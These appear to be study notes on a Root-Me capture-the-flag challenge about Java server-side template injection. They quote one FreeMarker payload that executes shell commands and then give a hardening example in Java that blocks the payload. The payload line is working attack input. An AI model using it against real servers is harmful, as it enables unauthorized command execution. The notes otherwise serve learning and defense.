Java: Server-side Template Injection (SSTI)

Root-Me challenge "Java - Server-side Template Injection": exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.


PayloadsAllTheThings: FreeMarker code execution

${"freemarker.template.utility.Execute"?new()("ls -la")}

etcetera.

Resources

Techniques

Counter moves

The variant in play here is Java server-side template injection (SSTI). The counter moves reduce to server-side validation and least privilege. The defensive counterpart is covered in the blue notes on the application layer as a target.
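What those two counter moves look like for FreeMarker, as an added example that is not part of the original notes or the challenge: user input is passed as data to a fixed template, and the `?new` built-in is denied any class lookup. It assumes FreeMarker 2.3.x on the classpath and Java 11 or later; the class and method names are hypothetical.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;
import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Map;

public class FreemarkerHardening {
    // The payload quoted in these notes, used only as test input.
    static final String PAYLOAD =
        "${\"freemarker.template.utility.Execute\"?new()(\"ls -la\")}";

    // Least privilege for the engine: ?new may not instantiate any class.
    static Configuration hardenedConfig() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_23);
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        cfg.setAPIBuiltinEnabled(false); // ?api stays off (this is the default)
        return cfg;
    }

    // Correct pattern: the template text is fixed, user input is only data.
    static String renderAsData(Configuration cfg, String userInput)
            throws IOException, TemplateException {
        Template t = new Template("greeting", new StringReader("Hello ${name}!"), cfg);
        StringWriter out = new StringWriter();
        t.process(Map.of("name", userInput), out);
        return out.toString();
    }

    // Risky pattern kept for comparison: user input becomes template source.
    static String renderAsTemplate(Configuration cfg, String userInput)
            throws IOException, TemplateException {
        Template t = new Template("untrusted",
                new StringReader("Hello " + userInput + "!"), cfg);
        StringWriter out = new StringWriter();
        t.process(Map.of(), out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        Configuration cfg = hardenedConfig();
        // Input treated as data is echoed literally, never evaluated.
        System.out.println(renderAsData(cfg, PAYLOAD));
        try {
            renderAsTemplate(cfg, PAYLOAD);
            System.out.println("UNEXPECTED: payload was evaluated");
        } catch (TemplateException e) {
            // The resolver refuses the class lookup, so rendering fails closed.
            System.out.println("blocked by class resolver");
        }
    }
}
```

The resolver setting is a backstop; keeping user input out of the template source is the primary fix, and running the application under an account that cannot read files it does not need limits the impact if both fail.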